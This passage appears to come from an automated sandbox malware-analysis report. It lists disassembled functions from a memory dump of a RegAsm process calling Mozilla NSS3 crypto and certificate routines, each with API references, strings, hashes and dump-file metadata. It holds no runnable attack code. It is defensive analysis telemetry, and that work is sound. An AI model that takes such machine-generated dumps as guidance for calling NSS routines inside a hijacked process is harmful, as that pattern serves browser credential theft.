PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C1BCD93,?), ref: 6C1BCEFC

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C1BCD93,?), ref: 6C1BCF0B

Part of subcall function 6C1B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C1BCD93,?), ref: 6C1BCF1D

Part of subcall function 6C1AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C1A8D2D,?,00000000,?), ref: 6C1AFB85
Part of subcall function 6C1AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C1AFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C1BCD93,?), ref: 6C1BCF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C1BCD93,?), ref: 6C1BCF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C1BCD93,?,?,?,?,?,?,?,?,?,?,?,6C1BCD93,?), ref: 6C1BCF78

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 65eec9402446d4e75ccf5eb3298bd0fd5c50cb5e24d6fb092cfbcc88db896810
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 7A11B4B5E003045BEB00AA667C51B6BB5EC9F5454DF15407DFC19E7741FB70DA088AB1

Function 6C168C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C168C1B
EnterCriticalSection.KERNEL32 ref: 6C168C34
PL_ArenaAllocate.NSS3 ref: 6C168C65
PR_Unlock.NSS3 ref: 6C168C9C
PR_Unlock.NSS3 ref: 6C168CB6

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

Strings

KRAM, xrefs: 6C168C8F

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: b95778481a76d2c01c4e6d740b0762edfebc1de766bc32e61ca87a7868652b7d
Instruction ID: a00c60e120bc914fc29bdf1cffe70855903cebb1558c70d5f6e7927def2d6f48
Opcode Fuzzy Hash: b95778481a76d2c01c4e6d740b0762edfebc1de766bc32e61ca87a7868652b7d
Instruction Fuzzy Hash: 022174B16056018FE700AF7AC484669F7F4FF05308F06896AD888CBB51DB35D895CB91

Function 6C262C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C262CA0
PR_ExitMonitor.NSS3 ref: 6C262CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C262CD1
strdup.MOZGLUE(?), ref: 6C262CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C262D27

Strings

Loaded library %s (static lib), xrefs: 6C262D22

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 4735cac1f262b53aefb450aaec8635a8b3b5b38c2cd375c6a50208dc92309750
Instruction ID: bad8b20a56a033c77d1f0564a5f15e64f483381815081baf199d07f83623a54e
Opcode Fuzzy Hash: 4735cac1f262b53aefb450aaec8635a8b3b5b38c2cd375c6a50208dc92309750
Instruction Fuzzy Hash: A211E2F56013099FEB008F16D848A6677B4AB4634EF14852DED0987F82E731E888CBA1

Function 6C1E1C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C1E1C74

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C1E1C92
free.MOZGLUE(?), ref: 6C1E1C99
DeleteCriticalSection.KERNEL32(?), ref: 6C1E1CCB
free.MOZGLUE(?), ref: 6C1E1CD2

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: ac693ed62f51635ef2ae3c94368cd89e11a5e1b21d7c784ad154214dc8178cf1
Instruction ID: b417a4e43fbc478d269d9e7e82b08bda15523675f5b271b6269faf33b4381513
Opcode Fuzzy Hash: ac693ed62f51635ef2ae3c94368cd89e11a5e1b21d7c784ad154214dc8178cf1
Instruction Fuzzy Hash: E30180F1F057219BDB20AFA49C0DB4977B8A70A71CF200525EE0AE7AC1D736E145C799

Function 6C241C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6C143D77,?,?,6C144E1D), ref: 6C241C8A
sqlite3_free.NSS3(00000000), ref: 6C241CB6

Strings

an index, xrefs: 6C241C67
non-deterministic use of %s() in %s, xrefs: 6C241C85
a CHECK constraint, xrefs: 6C241C76, 6C241C81
a generated column, xrefs: 6C241C6C

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
API String ID: 1840970956-3705377941
Opcode ID: 13ceedad01843324045c1b12f5ca803bbedcf26a69bdeb427d276b76ca4c82fb
Instruction ID: c20d7a50d166351cdbb5bb18289803254a8b6faa133183590092ccac47353c4f
Opcode Fuzzy Hash: 13ceedad01843324045c1b12f5ca803bbedcf26a69bdeb427d276b76ca4c82fb
Instruction Fuzzy Hash: 120128B1A002045BD704AB2CD802A7173E5EFC174CF15486DEC448BB82EB21E85AC751

Function 6C1F2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C1F3046

Part of subcall function 6C1DEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1DEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C1C7FFB), ref: 6C1F312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C1F3154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C1F2E8B

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

Part of subcall function 6C1DF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C1C9BFF,?,00000000,00000000), ref: 6C1DF134

memcpy.VCRUNTIME140(8B3C75C0,?,6C1C7FFA), ref: 6C1F2EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1F317B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 5997e0bd8199ce7472dffbb81979b9b5b47ddaccef5474ffd250e27337af053d
Instruction ID: 3cbcb4c2daf095aa55b95fbf7d70f199209ba27e142adf8efd382a7d0676c17c
Opcode Fuzzy Hash: 5997e0bd8199ce7472dffbb81979b9b5b47ddaccef5474ffd250e27337af053d
Instruction Fuzzy Hash: 78A1C171A002189FDB24CF54CC80BEAB7B5EF49308F148199ED596B741E735AE86CF91

Function 6C1BED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C1BED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C1BEDCE

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

free.MOZGLUE(00000000,?,?,?,?,6C1BB04F), ref: 6C1BEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C1BEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C1BEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C1BEEFB

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 0715b49dc0aa8e8405b5740f8e8faac7816cfaef108aecee3d57323a51c84fec
Instruction ID: e325ed855a798f46389c9e9872c9acb37e706032523d1c67acb1740434692c43
Opcode Fuzzy Hash: 0715b49dc0aa8e8405b5740f8e8faac7816cfaef108aecee3d57323a51c84fec
Instruction Fuzzy Hash: 42816CB5A002059FEB14CF59D884BAB77F5BF88308F14446CE815AB751DB35EA14CFA1

Function 6C1BCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C1BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C1BDAE2,?), ref: 6C1BC6C2

PR_Now.NSS3 ref: 6C1BCD35

Part of subcall function 6C219DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DC6
Part of subcall function 6C219DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DD1
Part of subcall function 6C219DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C219DED

Part of subcall function 6C1A6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C151C6F,00000000,00000004,?,?), ref: 6C1A6C3F

PR_GetCurrentThread.NSS3 ref: 6C1BCD54

Part of subcall function 6C219BF0: TlsGetValue.KERNEL32(?,?,?,6C260A75), ref: 6C219C07

Part of subcall function 6C1A7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C151CCC,00000000,00000000,?,?), ref: 6C1A729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C1BCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C1BCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C1BCE2C

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C1BCE40

Part of subcall function 6C1B14C0: TlsGetValue.KERNEL32 ref: 6C1B14E0
Part of subcall function 6C1B14C0: EnterCriticalSection.KERNEL32 ref: 6C1B14F5
Part of subcall function 6C1B14C0: PR_Unlock.NSS3 ref: 6C1B150D

Part of subcall function 6C1BCEE0: PORT_ArenaMark_Util.NSS3(?,6C1BCD93,?), ref: 6C1BCEEE
Part of subcall function 6C1BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C1BCD93,?), ref: 6C1BCEFC
Part of subcall function 6C1BCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C1BCD93,?), ref: 6C1BCF0B
Part of subcall function 6C1BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C1BCD93,?), ref: 6C1BCF1D

Part of subcall function 6C1BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C1BCD93,?), ref: 6C1BCF47
Part of subcall function 6C1BCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C1BCD93,?), ref: 6C1BCF67
Part of subcall function 6C1BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C1BCD93,?,?,?,?,?,?,?,?,?,?,?,6C1BCD93,?), ref: 6C1BCF78

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: eb8e846bddfda84492dab196f7f9f4cd68085ad4babcc8a4c9cdd19f1abafd49
Instruction ID: 2bf1f25718ab934b08d71f81ff8e943cbfcdd5f2328f5caa66af3c4df49ff140
Opcode Fuzzy Hash: eb8e846bddfda84492dab196f7f9f4cd68085ad4babcc8a4c9cdd19f1abafd49
Instruction Fuzzy Hash: 035193B6A001059FE710EF69DC50BAA77E4EF58348F250524E955F7B40EB31E905CF91

Function 6C18EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C18EF38

Part of subcall function 6C179520: PK11_IsLoggedIn.NSS3(00000000,?,6C1A379E,?,00000001,?), ref: 6C179542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C18EF53

Part of subcall function 6C194C20: TlsGetValue.KERNEL32 ref: 6C194C4C
Part of subcall function 6C194C20: EnterCriticalSection.KERNEL32(?), ref: 6C194C60
Part of subcall function 6C194C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C194CA1
Part of subcall function 6C194C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C194CBE
Part of subcall function 6C194C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C194CD2
Part of subcall function 6C194C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C194D3A

PR_GetCurrentThread.NSS3 ref: 6C18EF9E

Part of subcall function 6C219BF0: TlsGetValue.KERNEL32(?,?,?,6C260A75), ref: 6C219C07

free.MOZGLUE(00000000), ref: 6C18EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C18F016
free.MOZGLUE(00000000), ref: 6C18F022

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 25f3655a59c1eedaeaa5ed8957097991e560dc532f91230cd8dbbc206e2f1925
Instruction ID: 42cd5ec13fc3cbe477c44beda098e59fada87524996f6822f8afa4ad57dc5cb4
Opcode Fuzzy Hash: 25f3655a59c1eedaeaa5ed8957097991e560dc532f91230cd8dbbc206e2f1925
Instruction Fuzzy Hash: 86418FB1E05209AFDF018FA9D845BEE7BBAAF48358F104025F914A6351E772C9158BA1

Function 6C17CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C17CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C17D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C17D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C17D025
PR_NewLock.NSS3 ref: 6C17D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C17D074

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: 23c05b1f1f7dee312f077a68247fcf8e7d5826acdf452a91c4c4c7ce57b2ed20
Instruction ID: 3cc10f376542e0271afd1cc656aea080f83300b67f199f704a44517343956f7c
Opcode Fuzzy Hash: 23c05b1f1f7dee312f077a68247fcf8e7d5826acdf452a91c4c4c7ce57b2ed20
Instruction Fuzzy Hash: 3441A3B0A013198FDF20EF29C88879A7BE4EF18318F11516ADC198BB46D774D885CBB1

Function 6C162E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C152D1A), ref: 6C162E7E

Part of subcall function 6C1B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C158298,?,?,?,6C14FCE5,?), ref: 6C1B07BF
Part of subcall function 6C1B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C1B07E6
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B081B
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B0825

PR_Now.NSS3 ref: 6C162EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C162EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C152D1A), ref: 6C162F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C152D1A), ref: 6C162F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C162F81

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 1836dbe91c73975ed71fba45c290d02f29689046c2a28fd7ee2f168b34708157
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 0A3166715021008BF710C757CC58BAFB2A5EFA0358F6409FAC52DA7ED0EB3598AACB11

Function 6C150E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C150A2C), ref: 6C150E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C150A2C), ref: 6C150E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C150A2C), ref: 6C150E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C150A2C), ref: 6C150E90
free.MOZGLUE(00000000), ref: 6C150EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C150A2C), ref: 6C150ED9

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

